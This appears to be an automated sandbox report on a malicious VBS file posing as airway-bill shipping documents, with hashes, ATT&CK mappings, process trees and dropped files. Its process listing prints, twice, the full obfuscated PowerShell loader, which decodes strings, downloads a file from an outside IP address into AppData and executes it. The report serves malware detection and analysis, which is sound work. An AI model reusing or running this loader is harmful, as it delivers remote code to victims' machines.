8f6edaf7a58a791bf05eb1d5d3bac18561dad46b591bf0a3ed498358fa875e9d

General

Target

awb_shipping_documents_17_04_2024_00000.vbs
Size

932KB
MD5

ac5b979626e0255c763834243ddf8028
SHA1

507a1e4daa53d11c2453fd4c707260a5b8f054fc
SHA256

8f6edaf7a58a791bf05eb1d5d3bac18561dad46b591bf0a3ed498358fa875e9d
SHA512

8e5c0d73c6e3a11d44f010e35fd1eeefc650bb0f0bdaba972769b84d61fec39c168c8237dfe3f2d851371d8fe0289178af4ef28d2ec693cf10e769eeb39bd828
SSDEEP

12288:YGS9YA36Oat2ZWorFnXJD5b9NVzWixJ3q+DhXYBauruyZv:YGSSy6/IZWortfbBz7JTFXYUbyl

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

2 2636 WScript.exe
19 1228 powershell.exe

flow	pid	process
2	2636	WScript.exe
19	1228	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1228 powershell.exe
1228 powershell.exe
4676 powershell.exe
4676 powershell.exe
4676 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1228 powershell.exe
Token: SeDebugPrivilege 4676 powershell.exe

pid	process
1228	powershell.exe
1228	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2636 wrote to memory of 1228	2636	WScript.exe	powershell.exe
PID 2636 wrote to memory of 1228	2636	WScript.exe	powershell.exe
PID 1228 wrote to memory of 3760	1228	powershell.exe	cmd.exe
PID 1228 wrote to memory of 3760	1228	powershell.exe	cmd.exe
PID 1228 wrote to memory of 4676	1228	powershell.exe	powershell.exe
PID 1228 wrote to memory of 4676	1228	powershell.exe	powershell.exe
PID 1228 wrote to memory of 4676	1228	powershell.exe	powershell.exe
PID 4676 wrote to memory of 60	4676	powershell.exe	cmd.exe
PID 4676 wrote to memory of 60	4676	powershell.exe	cmd.exe
PID 4676 wrote to memory of 60	4676	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_17_04_2024_00000.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autopsychic = 1;$Nonaccompaniment='Substrin';$Nonaccompaniment+='g';Function Deflorerings($Systematician){$Butiksvinduers=$Systematician.Length-$Autopsychic;For($Faglitteraturen=6; $Faglitteraturen -lt $Butiksvinduers; $Faglitteraturen+=(7)){$Precordium+=$Systematician.$Nonaccompaniment.Invoke($Faglitteraturen, $Autopsychic);}$Precordium;}function Svns($Caedmonian){.($Roup) ($Caedmonian);}$Slangernes=Deflorerings 'ObligeM ApopeoIsolerz UdmaaiBigaralTr,tanlMacfaraAvidsp/E.cava5 Waste.Overbb0 Ba,re Trich(PlanerWSkjtefiArb jdnUn itidRe,ovaoS aamaw PretasSultek TrstigNSnableTForvrr Kejser1 gener0Folket.Anf el0Endova; Patri AustraWCivilaiGenertnTjenes6Forelo4Bygnin;Tokaye MetakrxBlo.fa6Flitwi4Selvra;la,gis undvrr FreshvGolden:telefo1Af,ngi2Ordreb1Thiocr.Abon i0 ufty)Slyngp IllyasGPrinsaefurc,acSuffelkCanel.oNantzs/ heavy2Kippag0Un.ann1I,mola0Common0Unch,d1Fertil0 Fontn1Specia StaalaF Kry tiFrst drudvik e KorrufL mfatoTroch,xHindgu/Apocat1Inut l2Philos1Ternst.Konsul0Skifte ';$Unsonorousness=Deflorerings 'FadmonUHurrersBunchieBordigrSejtrk- DristA aisangStemnieIntersn TushitCsects ';$Nedrullet=Deflorerings 'Bora,chTrhvept.nspirtOpsparpH.esit:Stroke/Stjmaa/ Skakk8Hypoph7H.glin.Synkre1 Paahn2Deface1Geolog.Slavia1Hedgi 0Circu 5pseudo.Delfin1Rekurs8Ve.miv4Dgnber/ExorciG Pe calTyvekoeSkelsaa Stream untsve FoilarCanoni.Fri,jumFe reriBef agxH drar ';$Justeringstabels=Deflorerings 'Unvari>Lnm,dt ';$Roup=Deflorerings ' letteiSrgespeRetra xsyll.b ';$Implicate = Deflorerings 'ReconveAvledycDekorah C.enoo studs Obduk %,ermutaWithypp Fr.adp BiscudSengebaDep tetHe.lggaChilie%Intole\Kart tTEksplohAc,lyprFleejoi .elefpS rubepBranchlsolacee Caden.TatarieD cigrk SidepsVarmet Brnela&Bescou&Boso s CorticePassagcCa,suihExultioformal Assecu$Araber ';Svns (Deflorerings 'Falkeb$PermutgfleshqlTria toDesil,bLivssta prokul,ljlss: TaarnV.ndbrao eglulMutterdi.speksBorgerk Slukn=Karamb(diagracTor,edmSandsld Septe .ronko/ Catamc Pros. Jagtg$searedIforhanmPanclap Bal nlEpitimiRe fnicProbataOv,rtitOr erne Ditte)Skumme ');Svns (Deflorerings ' Colos$Skftnigcarperl hausso Comp.bFellowaHibernlFlau.o:BevidnvT ughgeF.erbrj,eadlesEtterey MedersBiksemtroderie DannemPaint.e Sno,dt F rsk=Stoppe$UnpiniNKathleeBurdebdResultr StatiuLoesnilElihu lTamidieSynkopt,nderc. .ocaks SkiedpEgyptelKh rajiplaywrtspatan(vindik$TempelJsukkerurentersS,ueretFertileStud.erMa,kuriAtomisn,erigrg SpanksHeroshtWandera SpearbBun,reeDak,yllWuzzlesForsig)Pinda ');$Nedrullet=$vejsystemet[0];Svns (Deflorerings ' Scr.f$MicrosgNonappl Davcuo ,rirobTilfrsaRe coalTinget:AftrykI G,ubbngentiltNotidae .rster GennepHypoblrForheke Cubantmacrono.lysesr iaphai ResulaOutsenlArgume=BlazonNVaniste.asseswDi.tra-Ko.denOAblatibReemphjSwingeeFiolencFathertHanlec Cry toSJudd,oyAfkr.gs rekretRe.ysdeCysto mOccip,.Stofs N Ove.feVenos tProgra. MongoWDe siteWightmbCorequC ManiflTilridi BegynekmpersnRecopyt Konno ');Svns (Deflorerings ' siat$Att ciI Sabain MobiltSemicle FristrKennelpFathomrCoastleCoitaltVikario Hyperrlivsfai Ma,ceaGro.ndl Coeff. TarreHplu ereSorrowaGavtyvd PhoraeDistrirWaterssNonthe[Bl,ckh$KollagU kvatmn uphausAfvigeoParlamn CathooElefa,rPrearro Verniu .orgesDemon,nFi.mafeJulekasKor.sps Macr ]Ronked= Bre b$ GalvaSIntra.l DesseaTrustdnP igesgLeucoseGiasqurStavninFuldmaeDigte,sBranch ');$Trefoldig164=Deflorerings 'FlytteI KunstnMargratAutod.e gard,rCotelepAcronir ,ntegeAtrabitV ndstoUrv,kerOte coiTaetheaVidimul ti,st.AfhugnD A etnoBoeotiw Nonapn.enneilcolo ro Th.rvaAp eldd UnneuFIgnitei Sen.elSlimp,eSke ch(Sides $TriturNMor.eneU,dtagdParaffrNitrosuS.ptemlKlerenl Infeke SuccutWildly,T.icar$ UnappBApplauaUnsounr Spi.sb Laceri Pumict SpeciuWashdarReprogsG,ranty ObseqrBidiale Pandenqi,dar)An,ire ';$Trefoldig164=$Voldsk[1]+$Trefoldig164;$Barbitursyren=$Voldsk[0];Svns (Deflorerings ' ,okul$Efte tgOpsgeslSexpoto NummebHolophasamletl Primi: Fo esMFemvreiTekstilFa.ishd ThicknCapense .mpulsI.suscsUn.aile eckersWalldo= Forur(HelbreT NardueObservsFlfodet Girdi-MalemaPbe kreaFond.mtG nanvhSnonow Bankga$Bran aBTentoraAcanthrEnsteeb Rentei WeekvtDiskriu yalasrMorgensSiph,nyCoenoerPreutieAdvokans,mkri)Predup ');while (!$Mildnesses) {Svns (Deflorerings 'Devote$Abstr.gIvorialBall.to.entenbSteve,aFo,blilHa,rsp: ictaIWharpsnBlankot DispeebdeforgByggunrVat.rliKrlnintHemi yyOutbur= kiven$KvartetLrerflrpri,riuOr,anseIncre ') ;Svns $Trefoldig164;Svns (Deflorerings ' B rbuS.ruttetS,nguia Nonexrse ipetc.quin-SumpskS pkobllGlammeeFemogtePrope.p L nin Fartbl4 Trisy ');Svns (Deflorerings 'Int rc$SpdbargF.rtollNudieso ProsebNdvendaCircu.lPer,on:FoppyfMastigmi InnovlTen.rsdafhentn Mlle,eLyasessLevitisUdbrede Spaghs Drukk= Pulpy(CuboidTmrbankeNstmessWifel tB okbo- AllelP Skim.aOlefintNaturvh Ls.re Retune$TwinylBAccompaIdet frConcorb PhytoiKodakstPaternu Thro rZeugmasMarm.dyR,sserrDinocee,acaden Udpla)Bakked ') ;Svns (Deflorerings 'Interl$Portr.gAbouchlF,rudsofr.idsbPorcdoaBugalalJustif:PistolBCryptoauntailrStodgenQuantiaNon.lagS,deomtMisstai nddkngUncinah BldgreDa nebdbiblioeenjewenkommun=Mllene$ LjtnagLandsdl ElektoRiverbbPodsnaaKippeeltryg,u:BallephDipicruopdagemLance.oUn,erauN.syner,eminaiUmennesE envieProvst+ anven+Recont%Rntgen$nau,ravengouee Kontoj Lugtgs.reaclyHauliesBiogratlydseneFrilbsm agneseStudiet ,egns.Mytterc Hj emoProgr,u biophnEncorbtHacien ') ;$Nedrullet=$vejsystemet[$Barnagtigheden];}Svns (Deflorerings 'Stoneb$kejsergSands,l DuefaoCampshb Loy.laCanabalS agfr:SprosstPsychoeBe,audo Tormer ExpeceT.afiktBillediGod.ikk remhaeSubmarrAbjec,s Pacap Rgskye=B.glad SmiledGVie nee urvntSubpro-CalombCsleighoskumrinU.lbsdtSperlieFlashbnSelvvatSide,l Ra,ika$Ma,ernBSpreneaGgesnarAfsejlbRepriei InklutstranduMreretr AchlosOply,nyGroverr BerufeSvine,n Besig ');Svns (Deflorerings ' lbnin$ NondegWa.chflUdrreuoSec,ssb S,ernapartaklDekli.:Kon.anIKlagedmCu.laspOpelcla.rchosr ontinkOpgrelaVaroomtDe,atriOvervaoSuddsunPia,ab Ekspre=Entero givend[CoriumS UnderyCorrels TanistInheriebuskvkm.erfec.S.icieCmar rkoSkodd.nTelemevLambreeSargasr,vernitBudsti]Nuance:S.erig:UnfibeFIn iolrSk ldpoSkoleemArt,atBKlunteaforev,sIntendeUskyld6dyrk r4LykkefSUnauditScoun rAfsvamiSupersnBondemgoversp( Sheph$Butanetduovi.eUdgydeotroutfrFusaineTe,nastSkrubhiFederakGametoeVarmblrVilhe,s ,cari)Rein,o ');Svns (Deflorerings 'Na riu$OncogegSc,entlZygo.aoConforbPiezoma.prjtelUforso:VoveliSlovelecFiberpuForcerlSnkekll Ns.ebeNik ler C.troy S.ppi Klutzy=Recid Belial[ Krit SArbej.yTramelsTipsyotCultiseAnskafmDr,bbl.Opn aeTKont.re BlystxDuellatHalskd.M,cobaEArbej,nCrosslc ProceoMontefd,udiviiBoy,otn itulagRe,uma]Startp:Faulti:,eodicARust iSHypermCUnpresIPol thI .rede.asteroG,peluneWarinethyacinSJaspert AfhjarS.msvaiOpholdnBlegetgLotasa(Work.n$SpeakeIBefancmLstanspAppletaObskn.rTilskykAllan.aCommietTransci Kmpedo ,nkonnSkanse)Quietu ');Svns (Deflorerings ' Pulse$ Unwagg dis,olvurdero Wa,tabDeccasaTelefolAprils:gnidniA Fe.tlnQueecht,uculaiFreezygPathnarInter aImaginmKussesmUdfldna .asictDeponeiAl.orsc Realiam.salll Und r=Teasin$SpoutlSU gravcNykolouBr.erslBrunsvlSuppree ApabhrNetv,kySasser.Kb tadsKlargou N.carb multisGravertExorcirForfl.iCentran h.lvegPhlegm(Non,xt3 sekra1 ransi9Chondr2Berett0Taleli9Macrop,Whiptu2Om end8Bajone5Glycol0 Ek,ko2foregi)Un.pir ');Svns $Antigrammatical;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thripple.eks && echo $"
3⤵
PID:3760

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autopsychic = 1;$Nonaccompaniment='Substrin';$Nonaccompaniment+='g';Function Deflorerings($Systematician){$Butiksvinduers=$Systematician.Length-$Autopsychic;For($Faglitteraturen=6; $Faglitteraturen -lt $Butiksvinduers; $Faglitteraturen+=(7)){$Precordium+=$Systematician.$Nonaccompaniment.Invoke($Faglitteraturen, $Autopsychic);}$Precordium;}function Svns($Caedmonian){.($Roup) ($Caedmonian);}$Slangernes=Deflorerings 'ObligeM ApopeoIsolerz UdmaaiBigaralTr,tanlMacfaraAvidsp/E.cava5 Waste.Overbb0 Ba,re Trich(PlanerWSkjtefiArb jdnUn itidRe,ovaoS aamaw PretasSultek TrstigNSnableTForvrr Kejser1 gener0Folket.Anf el0Endova; Patri AustraWCivilaiGenertnTjenes6Forelo4Bygnin;Tokaye MetakrxBlo.fa6Flitwi4Selvra;la,gis undvrr FreshvGolden:telefo1Af,ngi2Ordreb1Thiocr.Abon i0 ufty)Slyngp IllyasGPrinsaefurc,acSuffelkCanel.oNantzs/ heavy2Kippag0Un.ann1I,mola0Common0Unch,d1Fertil0 Fontn1Specia StaalaF Kry tiFrst drudvik e KorrufL mfatoTroch,xHindgu/Apocat1Inut l2Philos1Ternst.Konsul0Skifte ';$Unsonorousness=Deflorerings 'FadmonUHurrersBunchieBordigrSejtrk- DristA aisangStemnieIntersn TushitCsects ';$Nedrullet=Deflorerings 'Bora,chTrhvept.nspirtOpsparpH.esit:Stroke/Stjmaa/ Skakk8Hypoph7H.glin.Synkre1 Paahn2Deface1Geolog.Slavia1Hedgi 0Circu 5pseudo.Delfin1Rekurs8Ve.miv4Dgnber/ExorciG Pe calTyvekoeSkelsaa Stream untsve FoilarCanoni.Fri,jumFe reriBef agxH drar ';$Justeringstabels=Deflorerings 'Unvari>Lnm,dt ';$Roup=Deflorerings ' letteiSrgespeRetra xsyll.b ';$Implicate = Deflorerings 'ReconveAvledycDekorah C.enoo studs Obduk %,ermutaWithypp Fr.adp BiscudSengebaDep tetHe.lggaChilie%Intole\Kart tTEksplohAc,lyprFleejoi .elefpS rubepBranchlsolacee Caden.TatarieD cigrk SidepsVarmet Brnela&Bescou&Boso s CorticePassagcCa,suihExultioformal Assecu$Araber ';Svns (Deflorerings 'Falkeb$PermutgfleshqlTria toDesil,bLivssta prokul,ljlss: TaarnV.ndbrao eglulMutterdi.speksBorgerk Slukn=Karamb(diagracTor,edmSandsld Septe .ronko/ Catamc Pros. Jagtg$searedIforhanmPanclap Bal nlEpitimiRe fnicProbataOv,rtitOr erne Ditte)Skumme ');Svns (Deflorerings ' Colos$Skftnigcarperl hausso Comp.bFellowaHibernlFlau.o:BevidnvT ughgeF.erbrj,eadlesEtterey MedersBiksemtroderie DannemPaint.e Sno,dt F rsk=Stoppe$UnpiniNKathleeBurdebdResultr StatiuLoesnilElihu lTamidieSynkopt,nderc. .ocaks SkiedpEgyptelKh rajiplaywrtspatan(vindik$TempelJsukkerurentersS,ueretFertileStud.erMa,kuriAtomisn,erigrg SpanksHeroshtWandera SpearbBun,reeDak,yllWuzzlesForsig)Pinda ');$Nedrullet=$vejsystemet[0];Svns (Deflorerings ' Scr.f$MicrosgNonappl Davcuo ,rirobTilfrsaRe coalTinget:AftrykI G,ubbngentiltNotidae .rster GennepHypoblrForheke Cubantmacrono.lysesr iaphai ResulaOutsenlArgume=BlazonNVaniste.asseswDi.tra-Ko.denOAblatibReemphjSwingeeFiolencFathertHanlec Cry toSJudd,oyAfkr.gs rekretRe.ysdeCysto mOccip,.Stofs N Ove.feVenos tProgra. MongoWDe siteWightmbCorequC ManiflTilridi BegynekmpersnRecopyt Konno ');Svns (Deflorerings ' siat$Att ciI Sabain MobiltSemicle FristrKennelpFathomrCoastleCoitaltVikario Hyperrlivsfai Ma,ceaGro.ndl Coeff. TarreHplu ereSorrowaGavtyvd PhoraeDistrirWaterssNonthe[Bl,ckh$KollagU kvatmn uphausAfvigeoParlamn CathooElefa,rPrearro Verniu .orgesDemon,nFi.mafeJulekasKor.sps Macr ]Ronked= Bre b$ GalvaSIntra.l DesseaTrustdnP igesgLeucoseGiasqurStavninFuldmaeDigte,sBranch ');$Trefoldig164=Deflorerings 'FlytteI KunstnMargratAutod.e gard,rCotelepAcronir ,ntegeAtrabitV ndstoUrv,kerOte coiTaetheaVidimul ti,st.AfhugnD A etnoBoeotiw Nonapn.enneilcolo ro Th.rvaAp eldd UnneuFIgnitei Sen.elSlimp,eSke ch(Sides $TriturNMor.eneU,dtagdParaffrNitrosuS.ptemlKlerenl Infeke SuccutWildly,T.icar$ UnappBApplauaUnsounr Spi.sb Laceri Pumict SpeciuWashdarReprogsG,ranty ObseqrBidiale Pandenqi,dar)An,ire ';$Trefoldig164=$Voldsk[1]+$Trefoldig164;$Barbitursyren=$Voldsk[0];Svns (Deflorerings ' ,okul$Efte tgOpsgeslSexpoto NummebHolophasamletl Primi: Fo esMFemvreiTekstilFa.ishd ThicknCapense .mpulsI.suscsUn.aile eckersWalldo= Forur(HelbreT NardueObservsFlfodet Girdi-MalemaPbe kreaFond.mtG nanvhSnonow Bankga$Bran aBTentoraAcanthrEnsteeb Rentei WeekvtDiskriu yalasrMorgensSiph,nyCoenoerPreutieAdvokans,mkri)Predup ');while (!$Mildnesses) {Svns (Deflorerings 'Devote$Abstr.gIvorialBall.to.entenbSteve,aFo,blilHa,rsp: ictaIWharpsnBlankot DispeebdeforgByggunrVat.rliKrlnintHemi yyOutbur= kiven$KvartetLrerflrpri,riuOr,anseIncre ') ;Svns $Trefoldig164;Svns (Deflorerings ' B rbuS.ruttetS,nguia Nonexrse ipetc.quin-SumpskS pkobllGlammeeFemogtePrope.p L nin Fartbl4 Trisy ');Svns (Deflorerings 'Int rc$SpdbargF.rtollNudieso ProsebNdvendaCircu.lPer,on:FoppyfMastigmi InnovlTen.rsdafhentn Mlle,eLyasessLevitisUdbrede Spaghs Drukk= Pulpy(CuboidTmrbankeNstmessWifel tB okbo- AllelP Skim.aOlefintNaturvh Ls.re Retune$TwinylBAccompaIdet frConcorb PhytoiKodakstPaternu Thro rZeugmasMarm.dyR,sserrDinocee,acaden Udpla)Bakked ') ;Svns (Deflorerings 'Interl$Portr.gAbouchlF,rudsofr.idsbPorcdoaBugalalJustif:PistolBCryptoauntailrStodgenQuantiaNon.lagS,deomtMisstai nddkngUncinah BldgreDa nebdbiblioeenjewenkommun=Mllene$ LjtnagLandsdl ElektoRiverbbPodsnaaKippeeltryg,u:BallephDipicruopdagemLance.oUn,erauN.syner,eminaiUmennesE envieProvst+ anven+Recont%Rntgen$nau,ravengouee Kontoj Lugtgs.reaclyHauliesBiogratlydseneFrilbsm agneseStudiet ,egns.Mytterc Hj emoProgr,u biophnEncorbtHacien ') ;$Nedrullet=$vejsystemet[$Barnagtigheden];}Svns (Deflorerings 'Stoneb$kejsergSands,l DuefaoCampshb Loy.laCanabalS agfr:SprosstPsychoeBe,audo Tormer ExpeceT.afiktBillediGod.ikk remhaeSubmarrAbjec,s Pacap Rgskye=B.glad SmiledGVie nee urvntSubpro-CalombCsleighoskumrinU.lbsdtSperlieFlashbnSelvvatSide,l Ra,ika$Ma,ernBSpreneaGgesnarAfsejlbRepriei InklutstranduMreretr AchlosOply,nyGroverr BerufeSvine,n Besig ');Svns (Deflorerings ' lbnin$ NondegWa.chflUdrreuoSec,ssb S,ernapartaklDekli.:Kon.anIKlagedmCu.laspOpelcla.rchosr ontinkOpgrelaVaroomtDe,atriOvervaoSuddsunPia,ab Ekspre=Entero givend[CoriumS UnderyCorrels TanistInheriebuskvkm.erfec.S.icieCmar rkoSkodd.nTelemevLambreeSargasr,vernitBudsti]Nuance:S.erig:UnfibeFIn iolrSk ldpoSkoleemArt,atBKlunteaforev,sIntendeUskyld6dyrk r4LykkefSUnauditScoun rAfsvamiSupersnBondemgoversp( Sheph$Butanetduovi.eUdgydeotroutfrFusaineTe,nastSkrubhiFederakGametoeVarmblrVilhe,s ,cari)Rein,o ');Svns (Deflorerings 'Na riu$OncogegSc,entlZygo.aoConforbPiezoma.prjtelUforso:VoveliSlovelecFiberpuForcerlSnkekll Ns.ebeNik ler C.troy S.ppi Klutzy=Recid Belial[ Krit SArbej.yTramelsTipsyotCultiseAnskafmDr,bbl.Opn aeTKont.re BlystxDuellatHalskd.M,cobaEArbej,nCrosslc ProceoMontefd,udiviiBoy,otn itulagRe,uma]Startp:Faulti:,eodicARust iSHypermCUnpresIPol thI .rede.asteroG,peluneWarinethyacinSJaspert AfhjarS.msvaiOpholdnBlegetgLotasa(Work.n$SpeakeIBefancmLstanspAppletaObskn.rTilskykAllan.aCommietTransci Kmpedo ,nkonnSkanse)Quietu ');Svns (Deflorerings ' Pulse$ Unwagg dis,olvurdero Wa,tabDeccasaTelefolAprils:gnidniA Fe.tlnQueecht,uculaiFreezygPathnarInter aImaginmKussesmUdfldna .asictDeponeiAl.orsc Realiam.salll Und r=Teasin$SpoutlSU gravcNykolouBr.erslBrunsvlSuppree ApabhrNetv,kySasser.Kb tadsKlargou N.carb multisGravertExorcirForfl.iCentran h.lvegPhlegm(Non,xt3 sekra1 ransi9Chondr2Berett0Taleli9Macrop,Whiptu2Om end8Bajone5Glycol0 Ek,ko2foregi)Un.pir ');Svns $Antigrammatical;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thripple.eks && echo $"
4⤵
PID:60

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1424 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:1288

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v425bmjc.xmf.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Thripple.eks
Filesize
452KB

MD5
0f56c5454d3315827edea50167f678c1

SHA1
e13842a8e912fab304fb989554270c3204edd1d2

SHA256
79d42ee82d0f26e5f7989bb43c27048d1267ad84d79ba7293a4761d7dd679bfa

SHA512
abde5b1acf4850deed6dff53b86ba43afd5f0be9a5d6d900261ec1019b6624c4e04b1ef8f23a3842c6bdd6d6af127647f046757ca1df576e1215444a12bdac5f

Download Submit
memory/1228-13-0x000001A022030000-0x000001A022052000-memory.dmp

Filesize
136KB

Download
memory/1228-14-0x00007FF9E9FE0000-0x00007FF9EAAA1000-memory.dmp

Filesize
10.8MB

Download
memory/1228-17-0x000001A008F00000-0x000001A008F10000-memory.dmp

Filesize
64KB

Download
memory/1228-16-0x000001A008F00000-0x000001A008F10000-memory.dmp

Filesize
64KB

Download
memory/1228-15-0x000001A008F00000-0x000001A008F10000-memory.dmp

Filesize
64KB

Download
memory/1228-20-0x00007FF9E9FE0000-0x00007FF9EAAA1000-memory.dmp

Filesize
10.8MB

Download
memory/1228-21-0x000001A008F00000-0x000001A008F10000-memory.dmp

Filesize
64KB

Download
memory/1228-22-0x000001A008F00000-0x000001A008F10000-memory.dmp

Filesize
64KB

Download
memory/4676-28-0x00000000055D0000-0x00000000055F2000-memory.dmp

Filesize
136KB

Download
memory/4676-44-0x0000000006660000-0x00000000066AC000-memory.dmp

Filesize
304KB

Download
memory/4676-26-0x0000000005690000-0x0000000005CB8000-memory.dmp

Filesize
6.2MB

Download
memory/4676-27-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/4676-24-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/4676-29-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/4676-30-0x0000000005DC0000-0x0000000005E26000-memory.dmp

Filesize
408KB

Download
memory/4676-31-0x0000000005E30000-0x0000000005E96000-memory.dmp

Filesize
408KB

Download
memory/4676-32-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/4676-38-0x0000000005EA0000-0x00000000061F4000-memory.dmp

Filesize
3.3MB

Download
memory/4676-43-0x0000000006590000-0x00000000065AE000-memory.dmp

Filesize
120KB

Download
memory/4676-25-0x0000000004FA0000-0x0000000004FD6000-memory.dmp

Filesize
216KB

Download
memory/4676-45-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/4676-46-0x0000000007EB0000-0x000000000852A000-memory.dmp

Filesize
6.5MB

Download
memory/4676-47-0x0000000006B90000-0x0000000006BAA000-memory.dmp

Filesize
104KB

Download
memory/4676-48-0x0000000007950000-0x00000000079E6000-memory.dmp

Filesize
600KB

Download
memory/4676-49-0x00000000078B0000-0x00000000078D2000-memory.dmp

Filesize
136KB

Download
memory/4676-50-0x0000000008AE0000-0x0000000009084000-memory.dmp

Filesize
5.6MB

Download
memory/4676-23-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/4676-53-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/4676-54-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing